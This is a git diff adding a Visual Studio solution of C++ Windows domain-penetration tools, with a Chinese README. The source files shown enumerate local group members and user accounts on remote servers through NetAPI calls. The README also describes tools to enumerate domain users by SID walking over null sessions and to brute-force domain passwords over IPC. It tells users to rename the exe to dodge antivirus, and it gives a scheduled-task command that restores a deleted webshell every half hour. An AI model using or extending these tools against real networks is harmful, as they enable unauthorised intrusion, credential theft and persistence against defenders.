+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WNetCancelConnection2", "..\WNetCancelConnection2\WNetCancelConnection2.vcxproj", "{CD50DA00-9955-42DC-9F9A-21FD27F04900}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnuDomainUser", "..\EnuDomainUser\EnuDomainUser.vcxproj", "{4B7BF7AA-B163-4673-B969-AF6074688F46}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "BlastDomainUserPwd", "..\BlastDomainUserPwd\BlastDomainUserPwd.vcxproj", "{8E6C051D-CCE2-4A1F-9E1C-458683468F7B}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SchtaskBackDoorWebshell", "..\SchtaskBackDoorWebshell\SchtaskBackDoorWebshell.vcxproj", "{6BF9BC0B-8C41-4BF3-86F6-FF4651942671}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}.Debug|x64.ActiveCfg = Debug|x64
+ {66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}.Debug|x64.Build.0 = Debug|x64
+ {66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}.Debug|x86.ActiveCfg = Debug|Win32
+ {66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}.Debug|x86.Build.0 = Debug|Win32
+ {66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}.Release|x64.ActiveCfg = Release|x64
+ {66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}.Release|x64.Build.0 = Release|x64
+ {66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}.Release|x86.ActiveCfg = Release|Win32
+ {66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}.Release|x86.Build.0 = Release|Win32
+ {F34A8EA5-9242-45FE-B71D-89706302A481}.Debug|x64.ActiveCfg = Debug|x64
+ {F34A8EA5-9242-45FE-B71D-89706302A481}.Debug|x64.Build.0 = Debug|x64
+ {F34A8EA5-9242-45FE-B71D-89706302A481}.Debug|x86.ActiveCfg = Debug|Win32
+ {F34A8EA5-9242-45FE-B71D-89706302A481}.Debug|x86.Build.0 = Debug|Win32
+ {F34A8EA5-9242-45FE-B71D-89706302A481}.Release|x64.ActiveCfg = Release|x64
+ {F34A8EA5-9242-45FE-B71D-89706302A481}.Release|x64.Build.0 = Release|x64
+ {F34A8EA5-9242-45FE-B71D-89706302A481}.Release|x86.ActiveCfg = Release|Win32
+ {F34A8EA5-9242-45FE-B71D-89706302A481}.Release|x86.Build.0 = Release|Win32
+ {6A90FBC9-89AF-4284-B984-5C33DC1D1864}.Debug|x64.ActiveCfg = Debug|x64
+ {6A90FBC9-89AF-4284-B984-5C33DC1D1864}.Debug|x64.Build.0 = Debug|x64
+ {6A90FBC9-89AF-4284-B984-5C33DC1D1864}.Debug|x86.ActiveCfg = Debug|Win32
+ {6A90FBC9-89AF-4284-B984-5C33DC1D1864}.Debug|x86.Build.0 = Debug|Win32
+ {6A90FBC9-89AF-4284-B984-5C33DC1D1864}.Release|x64.ActiveCfg = Release|x64
+ {6A90FBC9-89AF-4284-B984-5C33DC1D1864}.Release|x64.Build.0 = Release|x64
+ {6A90FBC9-89AF-4284-B984-5C33DC1D1864}.Release|x86.ActiveCfg = Release|Win32
+ {6A90FBC9-89AF-4284-B984-5C33DC1D1864}.Release|x86.Build.0 = Release|Win32
+ {F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}.Debug|x64.ActiveCfg = Debug|x64
+ {F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}.Debug|x64.Build.0 = Debug|x64
+ {F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}.Debug|x86.ActiveCfg = Debug|Win32
+ {F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}.Debug|x86.Build.0 = Debug|Win32
+ {F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}.Release|x64.ActiveCfg = Release|x64
+ {F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}.Release|x64.Build.0 = Release|x64
+ {F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}.Release|x86.ActiveCfg = Release|Win32
+ {F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}.Release|x86.Build.0 = Release|Win32
+ {3220347A-637E-4881-8226-799160A983DB}.Debug|x64.ActiveCfg = Debug|x64
+ {3220347A-637E-4881-8226-799160A983DB}.Debug|x64.Build.0 = Debug|x64
+ {3220347A-637E-4881-8226-799160A983DB}.Debug|x86.ActiveCfg = Debug|Win32
+ {3220347A-637E-4881-8226-799160A983DB}.Debug|x86.Build.0 = Debug|Win32
+ {3220347A-637E-4881-8226-799160A983DB}.Release|x64.ActiveCfg = Release|x64
+ {3220347A-637E-4881-8226-799160A983DB}.Release|x64.Build.0 = Release|x64
+ {3220347A-637E-4881-8226-799160A983DB}.Release|x86.ActiveCfg = Release|Win32
+ {3220347A-637E-4881-8226-799160A983DB}.Release|x86.Build.0 = Release|Win32
+ {CD50DA00-9955-42DC-9F9A-21FD27F04900}.Debug|x64.ActiveCfg = Debug|x64
+ {CD50DA00-9955-42DC-9F9A-21FD27F04900}.Debug|x64.Build.0 = Debug|x64
+ {CD50DA00-9955-42DC-9F9A-21FD27F04900}.Debug|x86.ActiveCfg = Debug|Win32
+ {CD50DA00-9955-42DC-9F9A-21FD27F04900}.Debug|x86.Build.0 = Debug|Win32
+ {CD50DA00-9955-42DC-9F9A-21FD27F04900}.Release|x64.ActiveCfg = Release|x64
+ {CD50DA00-9955-42DC-9F9A-21FD27F04900}.Release|x64.Build.0 = Release|x64
+ {CD50DA00-9955-42DC-9F9A-21FD27F04900}.Release|x86.ActiveCfg = Release|Win32
+ {CD50DA00-9955-42DC-9F9A-21FD27F04900}.Release|x86.Build.0 = Release|Win32
+ {4B7BF7AA-B163-4673-B969-AF6074688F46}.Debug|x64.ActiveCfg = Debug|x64
+ {4B7BF7AA-B163-4673-B969-AF6074688F46}.Debug|x64.Build.0 = Debug|x64
+ {4B7BF7AA-B163-4673-B969-AF6074688F46}.Debug|x86.ActiveCfg = Debug|Win32
+ {4B7BF7AA-B163-4673-B969-AF6074688F46}.Debug|x86.Build.0 = Debug|Win32
+ {4B7BF7AA-B163-4673-B969-AF6074688F46}.Release|x64.ActiveCfg = Release|x64
+ {4B7BF7AA-B163-4673-B969-AF6074688F46}.Release|x64.Build.0 = Release|x64
+ {4B7BF7AA-B163-4673-B969-AF6074688F46}.Release|x86.ActiveCfg = Release|Win32
+ {4B7BF7AA-B163-4673-B969-AF6074688F46}.Release|x86.Build.0 = Release|Win32
+ {8E6C051D-CCE2-4A1F-9E1C-458683468F7B}.Debug|x64.ActiveCfg = Debug|x64
+ {8E6C051D-CCE2-4A1F-9E1C-458683468F7B}.Debug|x64.Build.0 = Debug|x64
+ {8E6C051D-CCE2-4A1F-9E1C-458683468F7B}.Debug|x86.ActiveCfg = Debug|Win32
+ {8E6C051D-CCE2-4A1F-9E1C-458683468F7B}.Debug|x86.Build.0 = Debug|Win32
+ {8E6C051D-CCE2-4A1F-9E1C-458683468F7B}.Release|x64.ActiveCfg = Release|x64
+ {8E6C051D-CCE2-4A1F-9E1C-458683468F7B}.Release|x64.Build.0 = Release|x64
+ {8E6C051D-CCE2-4A1F-9E1C-458683468F7B}.Release|x86.ActiveCfg = Release|Win32
+ {8E6C051D-CCE2-4A1F-9E1C-458683468F7B}.Release|x86.Build.0 = Release|Win32
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Debug|x64.ActiveCfg = Debug|x64
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Debug|x64.Build.0 = Debug|x64
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Debug|x86.ActiveCfg = Debug|Win32
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Debug|x86.Build.0 = Debug|Win32
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Release|x64.ActiveCfg = Release|x64
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Release|x64.Build.0 = Release|x64
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Release|x86.ActiveCfg = Release|Win32
+ {6BF9BC0B-8C41-4BF3-86F6-FF4651942671}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {0EB29EE6-60FF-4564-AA44-DA7DB746A4CF}
+ EndGlobalSection
+EndGlobal
diff --git a/NetLocalGroupGetMembers/NetLocalGroupGetMembers.vcxproj b/NetLocalGroupGetMembers/NetLocalGroupGetMembers.vcxproj
new file mode 100644
index 0000000..d9a3850
--- /dev/null
+++ b/NetLocalGroupGetMembers/NetLocalGroupGetMembers.vcxproj
@@ -0,0 +1,146 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {66CFD2FE-B875-4330-8BAA-D2A9D4C712FF}
+ NetLocalGroupGetMembers
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/NetLocalGroupGetMembers/NetLocalGroupGetMembers.vcxproj.filters b/NetLocalGroupGetMembers/NetLocalGroupGetMembers.vcxproj.filters
new file mode 100644
index 0000000..2934970
--- /dev/null
+++ b/NetLocalGroupGetMembers/NetLocalGroupGetMembers.vcxproj.filters
@@ -0,0 +1,22 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git "a/NetLocalGroupGetMembers/\346\272\220.cpp" "b/NetLocalGroupGetMembers/\346\272\220.cpp"
new file mode 100644
index 0000000..80120c9
--- /dev/null
+++ "b/NetLocalGroupGetMembers/\346\272\220.cpp"
@@ -0,0 +1,27 @@
+#include
+#include
+#include
+
+#pragma comment(lib, "Netapi32.lib")
+
+int wmain(int argc, wchar_t* argv[]) {
+ if (argc != 3) {
+ wprintf(L"Usage: %s \n", argv[0]);
+ wprintf(L" %s administrators \\\\192.168.232.128\n", argv[0]);
+ exit(1);
+ }
+
+ LPCWSTR servername = argv[2]; // ѾipcӵIP
+ LPCWSTR TargetGroup = argv[1]; //
+ LOCALGROUP_MEMBERS_INFO_2* buff; // LOCALGROUP_MEMBERS_INFO_2ṹbuffŻȡϢ
+ DWORD dwPrefmaxlen = MAX_PREFERRED_LENGTH; // ָݵѡȣֽΪλָMAX_PREFERRED_LENGTHúڴ
+ DWORD dwEntriesread; // ָһֵָ룬ֵʵöٵԪ
+ DWORD dwTotalentries;
+ NetLocalGroupGetMembers(servername, TargetGroup, 2, (LPBYTE*)&buff, dwPrefmaxlen, &dwEntriesread, &dwTotalentries, NULL);
+ // wprintf(L"dwEntriesread: %d\ndwTotalentries: %d\n", dwEntriesread, dwTotalentries);
+ for (DWORD i = 0; i < dwEntriesread; i++) {
+ wprintf(L"%s\n", buff[i].lgrmi2_domainandname);
+ // wprintf(L"SID:%d\n", buff[i].lgrmi2_sid); // sidǺҪ
+ // wprintf(L"SIDUSAGE:%d\n",buff[i].lgrmi2_sidusage);
+ }
+}
\ No newline at end of file
diff --git a/NetUserEnum/NetUserEnum.vcxproj b/NetUserEnum/NetUserEnum.vcxproj
new file mode 100644
index 0000000..226a4bd
--- /dev/null
+++ b/NetUserEnum/NetUserEnum.vcxproj
@@ -0,0 +1,146 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {F9FEAC7A-4B65-4D7D-86BE-831E3C7D900F}
+ NetUserEnum
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/NetUserEnum/NetUserEnum.vcxproj.filters b/NetUserEnum/NetUserEnum.vcxproj.filters
new file mode 100644
index 0000000..2934970
--- /dev/null
+++ b/NetUserEnum/NetUserEnum.vcxproj.filters
@@ -0,0 +1,22 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git "a/NetUserEnum/\346\272\220.cpp" "b/NetUserEnum/\346\272\220.cpp"
new file mode 100644
index 0000000..3c0ac13
--- /dev/null
+++ "b/NetUserEnum/\346\272\220.cpp"
@@ -0,0 +1,107 @@
+#ifndef UNICODE
+#define UNICODE
+#endif
+#pragma comment(lib, "netapi32.lib")
+
+#include
+#include
+#include
+#include
+
+int wmain(int argc, wchar_t* argv[])
+{
+ LPUSER_INFO_0 pBuf = NULL;
+ LPUSER_INFO_0 pTmpBuf;
+ DWORD dwLevel = 0;
+ DWORD dwPrefMaxLen = MAX_PREFERRED_LENGTH;
+ DWORD dwEntriesRead = 0;
+ DWORD dwTotalEntries = 0;
+ DWORD dwResumeHandle = 0;
+ DWORD i;
+ DWORD dwTotalCount = 0;
+ NET_API_STATUS nStatus;
+ LPTSTR pszServerName = NULL;
+
+ if (argc > 2)
+ {
+ fwprintf(stderr, L"Usage: %s [\\\\ServerName]\n", argv[0]);
+ exit(1);
+ }
+ // The server is not the default local computer.
+ //
+ if (argc == 2)
+ pszServerName = (LPTSTR)argv[1];
+ wprintf(L"\nUser account on %s: \n", pszServerName);
+ //
+ // Call the NetUserEnum function, specifying level 0;
+ // enumerate global user account types only.
+ //
+ do // begin do
+ {
+ nStatus = NetUserEnum((LPCWSTR)pszServerName,
+ dwLevel,
+ FILTER_NORMAL_ACCOUNT, // global users
+ (LPBYTE*)&pBuf,
+ dwPrefMaxLen,
+ &dwEntriesRead,
+ &dwTotalEntries,
+ &dwResumeHandle);
+ //
+ // If the call succeeds,
+ //
+ if ((nStatus == NERR_Success) || (nStatus == ERROR_MORE_DATA))
+ {
+ if ((pTmpBuf = pBuf) != NULL)
+ {
+ //
+ // Loop through the entries.
+ //
+ for (i = 0; (i < dwEntriesRead); i++)
+ {
+ assert(pTmpBuf != NULL);
+
+ if (pTmpBuf == NULL)
+ {
+ fprintf(stderr, "An access violation has occurred\n");
+ break;
+ }
+ //
+ // Print the name of the user account.
+ //
+ wprintf(L"\t-- %s\n", pTmpBuf->usri0_name);
+
+ pTmpBuf++;
+ dwTotalCount++;
+ }
+ }
+ }
+ //
+ // Otherwise, print the system error.
+ //
+ else
+ fprintf(stderr, "A system error has occurred: %d\n", nStatus);
+ //
+ // Free the allocated buffer.
+ //
+ if (pBuf != NULL)
+ {
+ NetApiBufferFree(pBuf);
+ pBuf = NULL;
+ }
+ }
+ // Continue to call NetUserEnum while
+ // there are more entries.
+ //
+ while (nStatus == ERROR_MORE_DATA); // end do
+ //
+ // Check again for allocated memory.
+ //
+ if (pBuf != NULL)
+ NetApiBufferFree(pBuf);
+ //
+ // Print the final count of users enumerated.
+ //
+ fprintf(stderr, "\nTotal of %d entries enumerated\n", dwTotalCount);
+
+ return 0;
+}
\ No newline at end of file
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..e04ba3b
--- /dev/null
+++ b/README.md
@@ -0,0 +1,154 @@
+# 我的C++学习过程-编写的域渗透小工具
+
+## 0x01. NetLocalGroupGetMembers
+
+功能:查询目标服务器本地管理组的成员
+
+
+
+## 0x02. NetLocalGroupEnum
+
+功能:返回指定服务器上的所有本地组
+
+
+
+## 0x03. NetGroupGetUsers
+
+功能:返回指定服务器指定组的所有成员
+
+查询域里的各个组里的成员,IP必须是域控IP
+
+
+
+## 0x04. NetUserEnum
+
+功能:查询目标服务器所有用户,包括隐藏用户
+
+
+
+## 0x05. wnetaddconnection2a
+
+功能:建立IPC连接,可以将目标共享目录映射到本地磁盘
+
+
+
+## 0x06. WNetCancelConnection2
+
+功能:删除IPC连接
+
+
+
+## 0x07. EnuDomainUser
+
+功能:枚举域用户
+
+### 1. 介绍
+
+适用于:当前边界机器权限是工作组机器,通过nltest或者nbtscan等工具发现内网有域环境,并且找到域控IP,但是没有域用户的权限下渗透思路。
+
+前提条件:能够和域控建立空连接
+
+实现原理:域管默认都会有administrator用户,通过windows api查出administrator域管的SID,然后遍历SID范围,枚举出域成员(域用户和域机器)。
+
+SID范围:域用户和域机器的SID一般是1000以上,所以使用工具的时候遍历1000以上的SID
+
+### 2. 工具使用
+
+使用帮助:
+
+```
+C:\Users\Administrator\Desktop>EnuDomainUser.exe
+Usage: EnuDomainUser.exe
+ EnuDomainUser.exe \\192.168.52.2 hack\administrator 1000 2000 100
+ EnuDomainUser.exe \\域控IP 域名\域用户名<默认administrator> 起始Sid 末尾Sid 多线程数目
+```
+
+使用demo:
+
+`EnuDomainUser.exe 192.168.52.2 hack\administrator 1000 2000 100`
+
+参数解释:
+
+```
+192.168.52.2 是域控IP
+hack 是域名
+administrator 是域管默认用户
+1000 是遍历SID的起始
+2000 是遍历SID的末尾-可以设置高一点,例如10000,20000等
+100 是多线程的数目
+```
+
+
+
+
+## 0x08. BlastDomainUserPwd
+
+功能:爆破域用户密码
+
+### 1. 介绍
+
+通过IPC连接->爆破域用户的密码
+
+
+结合EnuDomainUser工具或者kerbrute工具获取域用户名列表,然后进行爆破
+
+
+如果被360杀,改一下exe名字即可
+
+设计思路:
+
+1. 如果能够和域控建立空连接,则用EnuDomainUser工具枚举遍历出所有域用户名
+
+2. 如果不能够和域控建立空连接,则用kerbrute工具爆破域用户名
+
+当获取到一批域用户名后,开始尝试域用户密码的弱口令爆破
+
+域用户密码有强度要求,则尝试爆破强弱口令。例如:P@ssw0rd、1qaz@WSX等
+
+### 2. 工具的使用
+
+```
+Usage: BlastDomainUserPwd.exe
+ BlastDomainUserPwd.exe \\192.168.52.29 domainUser.txt password 100
+ BlastDomainUserPwd.exe \\域机器IP 域用户名字典 尝试爆破的密码 多线程数目
+```
+
+域用户名字典格式规范:域名\域用户名
+
+ `domain\user`
+
+
+
+
+运行实例: `BlastDomainUserPwd.exe \\192.168.52.2 domainUser.txt 1qaz@WSX 3`
+
+
+
+成功爆破出的域用户密码保存在当前目录的success.txt文本里
+
+
+
+
+## 0x09. SchtaskBackDoorWebshell
+
+功能:计划任务维持webshell
+
+### 1. 适用场景:
+
+护网中被防守方发现webshell,并清除出去,漏洞也被修复,然后网站恢复后不能再上传webshell时,通过计划任务重写webshell。
+
+### 2. 条件:
+
+管理员权限,因为创建计划任务得需要管理员权限
+
+### 3. 使用方法:
+
+xxxx.exe c:\wwww\upload\1.jsp
+
+### 4. 实现过程:
+
+将c:\wwww\upload\1.jsp内容复制到c:\windows\temp\tempsh.txt里,然后创建了一个计划任务,执行的命令是`c:\windows\system32\cmd.exe /c copy c:\windows\temp\tempsh.txt c:\wwww\upload\1.jsp`,每半小时触发一次。
+
+### 5. 视频展示:
+
+
\ No newline at end of file
diff --git a/SchtaskBackDoorWebshell/.gitignore b/SchtaskBackDoorWebshell/.gitignore
new file mode 100644
index 0000000..e645270
--- /dev/null
+++ b/SchtaskBackDoorWebshell/.gitignore
@@ -0,0 +1,353 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+##
+## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
+
+# User-specific files
+*.rsuser
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Mono auto generated files
+mono_crash.*
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+[Rr]eleases/
+x64/
+x86/
+[Aa][Rr][Mm]/
+[Aa][Rr][Mm]64/
+bld/
+[Bb]in/
+[Oo]bj/
+[Ll]og/
+[Ll]ogs/
+
+# Visual Studio 2015/2017 cache/options directory
+.vs/
+# Uncomment if you have tasks that create the project's static files in wwwroot
+#wwwroot/
+
+# Visual Studio 2017 auto generated files
+Generated\ Files/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+# NUnit
+*.VisualState.xml
+TestResult.xml
+nunit-*.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+# Benchmark Results
+BenchmarkDotNet.Artifacts/
+
+# .NET Core
+project.lock.json
+project.fragment.lock.json
+artifacts/
+
+# StyleCop
+StyleCopReport.xml
+
+# Files built by Visual Studio
+*_i.c
+*_p.c
+*_h.h
+*.ilk
+*.meta
+*.obj
+*.iobj
+*.pch
+*.pdb
+*.ipdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*_wpftmp.csproj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+*.VC.db
+*.VC.VC.opendb
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# Visual Studio Trace Files
+*.e2e
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+*.DotSettings.user
+
+# JustCode is a .NET coding add-in
+.JustCode
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# AxoCover is a Code Coverage Tool
+.axoCover/*
+!.axoCover/settings.json
+
+# Visual Studio code coverage results
+*.coverage
+*.coveragexml
+
+# NCrunch
+_NCrunch_*
+.*crunch*.local.xml
+nCrunchTemp_*
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+# Note: Comment the next line if you want to checkin your web deploy settings,
+# but database connection strings (with potential passwords) will be unencrypted
+*.pubxml
+*.publishproj
+
+# Microsoft Azure Web App publish settings. Comment the next line if you want to
+# checkin your Azure Web App publish settings, but sensitive information contained
+# in these scripts will be unencrypted
+PublishScripts/
+
+# NuGet Packages
+*.nupkg
+# NuGet Symbol Packages
+*.snupkg
+# The packages folder can be ignored because of Package Restore
+**/[Pp]ackages/*
+# except build/, which is used as an MSBuild target.
+!**/[Pp]ackages/build/
+# Uncomment if necessary however generally it will be regenerated when needed
+#!**/[Pp]ackages/repositories.config
+# NuGet v3's project.json files produces more ignorable files
+*.nuget.props
+*.nuget.targets
+
+# Microsoft Azure Build Output
+csx/
+*.build.csdef
+
+# Microsoft Azure Emulator
+ecf/
+rcf/
+
+# Windows Store app package directories and files
+AppPackages/
+BundleArtifacts/
+Package.StoreAssociation.xml
+_pkginfo.txt
+*.appx
+*.appxbundle
+*.appxupload
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!?*.[Cc]ache/
+
+# Others
+ClientBin/
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.jfm
+*.pfx
+*.publishsettings
+orleans.codegen.cs
+
+# Including strong name files can present a security risk
+# (https://github.com/github/gitignore/pull/2483#issue-259490424)
+#*.snk
+
+# Since there are multiple workflows, uncomment next line to ignore bower_components
+# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
+#bower_components/
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+ServiceFabricBackup/
+*.rptproj.bak
+
+# SQL Server files
+*.mdf
+*.ldf
+*.ndf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+*.rptproj.rsuser
+*- [Bb]ackup.rdl
+*- [Bb]ackup ([0-9]).rdl
+*- [Bb]ackup ([0-9][0-9]).rdl
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# GhostDoc plugin setting file
+*.GhostDoc.xml
+
+# Node.js Tools for Visual Studio
+.ntvs_analysis.dat
+node_modules/
+
+# Visual Studio 6 build log
+*.plg
+
+# Visual Studio 6 workspace options file
+*.opt
+
+# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
+*.vbw
+
+# Visual Studio LightSwitch build output
+**/*.HTMLClient/GeneratedArtifacts
+**/*.DesktopClient/GeneratedArtifacts
+**/*.DesktopClient/ModelManifest.xml
+**/*.Server/GeneratedArtifacts
+**/*.Server/ModelManifest.xml
+_Pvt_Extensions
+
+# Paket dependency manager
+.paket/paket.exe
+paket-files/
+
+# FAKE - F# Make
+.fake/
+
+# CodeRush personal settings
+.cr/personal
+
+# Python Tools for Visual Studio (PTVS)
+__pycache__/
+*.pyc
+
+# Cake - Uncomment if you are using it
+# tools/**
+# !tools/packages.config
+
+# Tabs Studio
+*.tss
+
+# Telerik's JustMock configuration file
+*.jmconfig
+
+# BizTalk build output
+*.btp.cs
+*.btm.cs
+*.odx.cs
+*.xsd.cs
+
+# OpenCover UI analysis results
+OpenCover/
+
+# Azure Stream Analytics local run output
+ASALocalRun/
+
+# MSBuild Binary and Structured Log
+*.binlog
+
+# NVidia Nsight GPU debugger configuration file
+*.nvuser
+
+# MFractors (Xamarin productivity tool) working folder
+.mfractor/
+
+# Local History for Visual Studio
+.localhistory/
+
+# BeatPulse healthcheck temp database
+healthchecksdb
+
+# Backup folder for Package Reference Convert tool in Visual Studio 2017
+MigrationBackup/
+
+# Ionide (cross platform F# VS Code tools) working folder
+.ionide/
diff --git a/SchtaskBackDoorWebshell/SchtaskBackDoorWebshell.sln b/SchtaskBackDoorWebshell/SchtaskBackDoorWebshell.sln
new file mode 100644
index 0000000..b5d9ad3
--- /dev/null
+++ b/SchtaskBackDoorWebshell/SchtaskBackDoorWebshell.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.30011.22
+MinimumVisualStudioVersion = 10.0.40219.1
